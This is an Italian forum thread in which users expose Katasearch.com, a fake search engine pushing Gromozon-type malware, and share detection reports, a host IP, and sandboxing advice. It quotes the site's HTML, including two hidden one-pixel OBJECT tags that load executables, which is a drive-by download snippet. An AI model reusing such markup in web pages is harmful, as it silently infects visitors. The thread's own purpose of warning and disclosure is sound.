Katasearch.com un falso motore basato su google che diffonde malware
Il file in questione sfugge ancora a quasi tutti gli antivirus.

per saperne di piu' come al solito c'è mio blog per chi ne ha voglia

maipiugromozon.blogspot.com (http://maipiugromozon.blogspot.com)

infatti i link della home di kataSearch.com portano a google.it


<FONT size=-1><A
href="http://www.google.it/intl/it/ads/">Pubblicità</A> - <A
href="http://www.google.it/services/">Soluzioni Aziendali</A> - <A
href="http://www.google.it/intl/it/about.html">Tutto su Katasearch </A> - <A
href="http://www.google.com/ncr">Katasearch.com in English</A></FONT>

<P><FONT size=-2> © 4361 Katasearch </FONT></P>
<OBJECT CLASSID="CLSID:E4792F3D-760F-4f7d-9612-4DA401D88CF4" CODEBASE="sharewke.exe" width="1" height="1"></OBJECT>

<OBJECT CLASSID="CLSID:596A9DF1-13F3-4691-AC38-0516B7C2FD5E" CODEBASE="GHROMLO.exe" width="1" height="1"></OBJECT>

se l'esecuzione di script è bloccata non vi è problema a fare ricerche..
io ci sono andato con FireFox e "noScript" attivato :)

scarica i due file se premo "login" e bit-defender li identica come malevoli e li blocca subito, considera che è aggiornato a lunedì mattina alle ore 08:30 :)

ciao mouseup,
navigando quà e là mi capita spesso su google di ritrovare nei risultati dei link sicuramente infetti da gromozon e fratelli.
volevo sapere come posso fare per comunicarteli eventualmente per "arricchire" il tuo blog molto utile! :p
fammi sapere.

p.s.: questi indirizzi sono facilmente riconoscibili anche senza accedervi, vi chiederete come? e presto detto: molti risultati hanno nomi strani nei domini come ad esempio: h**p:www.123544789.it (molto sospetto ma nome generato dalla mia fantasia e non so se esiste veramente) oppure hanno parole chiave che non hanno attinenza tra loro. ad esempio potreste trovare una semplice paginetta di internet con un elenco di parole chiave diverse tipo

cane, macchina, pasta al forno ecc...

un esempio di pagina sospetta è questa: h**p://www.corso-due-w.org/res472.htm

quì vi sono diverse parole chiave che non hanno attinenza tra loro.

una pagina piena che serve per aumentare le probabilità di essere visualizzata ai primi posti su google. ovviamente sono siti civetta che servono per farvi infettare da gromozon e fratelli.

ciao mouseup,
navigando quà e là mi capita spesso su google di ritrovare nei risultati dei link sicuramente infetti da gromozon e fratelli.
volevo sapere come posso fare per comunicarteli eventualmente per "arricchire" il tuo blog molto utile! :p
fammi sapere.

p.s.: questi indirizzi sono facilmente riconoscibili anche senza accedervi, vi chiederete come? e presto detto: molti risultati hanno nomi strani nei domini come ad esempio: h**p:www.123544789.it (molto sospetto ma nome generato dalla mia fantasia e non so se esiste veramente) oppure hanno parole chiave che non hanno attinenza tra loro. ad esempio potreste trovare una semplice paginetta di internet con un elenco di parole chiave diverse tipo

cane, maccina, pasta al forno ecc...

un esempio di pagina sospetta è questa: h**p://www.corso-due-w.org/res472.htm

quì vi sono diverse parole chiave che non hanno attinenza tra loro.

una paghina piena che serve per aumentare le probabilità di essere visualizzata ai primi posti su google. ovviamente sono siti civetta che servono per farvi infettare da gromozon e fratelli.


Vedo con piacere che hai capito come funziona il sistema delle pagine civetta infette.Penso che siano dell'ordine delle centinaia di migliaia se non addirittura qualche milione.Google dice addirittura che
le pagine potenziamente dannose sono 1/10 di quelle presenti sul web.
Per questo io punto agli Ip. Comunque i malware di solito si trovano sempre in russia o ucraina (almeno quelli di quella gang li).Quei range devono assolutamente essere bloccati perche' ospitano fisicamente il virus.

In effetti non ci vuole molto a capire se un sito sia potenzialmente dannoso.
Di solito quando vado a controllare di cosa si tratta so gia' cosa piu' o meno mi
aspetta.Per questo usate firefox con noscript oppure ancora meglio sandboxie. Se hai qualche informazione su questo tipo di spazzatura puoi comunicarla nei commenti del blog oppure mandarmi un messaggio personale qui

Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.

Un'ultima raccomandazione per chi usa nod32. Dovete intregrare la protezione con altri software sfruttando la leggerezza di questo prodotto perche' purtroppo nod ha una capacita' di rivelazione dei virus non straordinaria attualmente.
La mia esperienza conferma i risultati di av-test.org

Vedo con piacere che hai capito come funziona il sistema delle pagine civetta infette.Penso che siano dell'ordine delle centinaia di migliaia se non addirittura qualche milione.Google dice addirittura che
le pagine potenziamente dannose sono 1/10 di quelle presenti sul web.
Per questo io punto agli Ip. Comunque i malware di solito si trovano sempre in russia o ucraina (almeno quelli di quella gang li).Quei range devono assolutamente essere bloccati perche' ospitano fisicamente il virus.

In effetti non ci vuole molto a capire se un sito sia potenzialmente dannoso.
Di solito quando vado a controllare di cosa si tratta so gia' cosa piu' o meno mi
aspetta.Per questo usate firefox con noscript oppure ancora meglio sandboxie. Se hai qualche informazione su questo tipo di spazzatura puoi comunicarla nei commenti del blog oppure mandarmi un messaggio personale qui

Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.

Un'ultima raccomandazione per chi usa nod32. Dovete intregrare la protezione con altri software sfruttando la leggerezza di questo prodotto perche' purtroppo nod ha una capacita' di rivelazione dei virus non straordinaria attualmente.
La mia esperienza conferma i risultati di av-test.org
sarà fatto, comincia ad aspettarti un pò di messaggi privati! ;)

p.s.: ho provveduto a segnalare a kaspersky questo tipo di rootkit che cambia spesso, insomma ho chiesto di tenere sotto controllo questo indirizzo.
per quanto riguarda il browser uso opera e non mi sono mai infettato!!! :D

mi hanno appena risposto dalla kaspersky quanto segue:

Hello,

katasearch.ex - Trojan-Clicker.Win32.Agent.ip

This file is already detected. Please update your antivirus bases.


avevo scritto che era un nuovo virus ma kaspersky è troppo avanti!!! :p

quindi noi utenti kasperskini siamo già protetti. :D :D :D

non mostra un sito reale come primo risultato ma un falso sito inesistente per farti scaricare i due virus che avevo riportato sopra..

esempio, ho cercato "alberti elisabetta" e il sito reale è il "albertielisabetta.eu" che è primo su google ma secondo in questo falso motore di ricerca:

http://img115.imageshack.us/img115/4126/provadange8.th.png (http://img115.imageshack.us/img115/4126/provadange8.png)

clickando sul primo link non succede altro che questa schermata in loop che spinge a scaricare volontariamente il file infetto:
http://img259.imageshack.us/img259/2249/provadan2mf9.th.png (http://img259.imageshack.us/img259/2249/provadan2mf9.png)


l'unico modo per infettarsi è clickare sul link in alto "accesso" :)
era solo per dare un esempio di questo caso specifico nel quale il "civetta" non è esistente...
anche cambiando ricerca esempio "bancaintesa" il primo link che compare è sempre inesistente e facente parte all'ip: 208.101.37.109

non mostra un sito reale come primo risultato ma un falso sito inesistente per farti scaricare i due virus che avevo riportato sopra..

esempio, ho cercato "alberti elisabetta" e il sito reale è il "albertielisabetta.eu" che è primo su google ma secondo in questo falso motore di ricerca:

http://img115.imageshack.us/img115/4126/provadange8.th.png (http://img115.imageshack.us/img115/4126/provadange8.png)

clickando sul primo link non succede altro che questa schermata in loop che spinge a scaricare volontariamente il file infetto:
http://img259.imageshack.us/img259/2249/provadan2mf9.th.png (http://img259.imageshack.us/img259/2249/provadan2mf9.png)


l'unico modo per infettarsi è clickare sul link in alto "accesso" :)
era solo per dare un esempio di questo caso specifico nel quale il "civetta" non è esistente...
anche cambiando ricerca esempio "bancaintesa" il primo link che compare è sempre inesistente e facente parte all'ip: 208.101.37.109

esatto

mi hanno appena risposto dalla kaspersky quanto segue:

Hello,

katasearch.ex - Trojan-Clicker.Win32.Agent.ip

This file is already detected. Please update your antivirus bases.


avevo scritto che era un nuovo virus ma kaspersky è troppo avanti!!! :p

quindi noi utenti kasperskini siamo già protetti. :D :D :D

Niente di straordinario in quel file:D

Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.

cosa sonoi programmi di virtualizzazione?

cosa sonoi programmi di virtualizzazione?

Programmi come questi:

Virtualization Tools

Altiris Software Virtualization Solution
http://www.altiris.com/Products/SoftwareVirtualizationSolution.aspx

BufferZone
http://www.trustware.com/home.php

Deep Freeze
http://www.faronics.com/html/deepfreeze.asp

GreenBorder
http://greenborder.com/ ---------->acquistato da Google

ShadowSurfer
http://www.shadowstor.com/products.html

VirtualSandbox
http://www.fortresgrand.com/products/vsb/vsb.htm

VMware Browser Appliance Free!
http://www.vmware.com/vmtn/vm/browserapp.html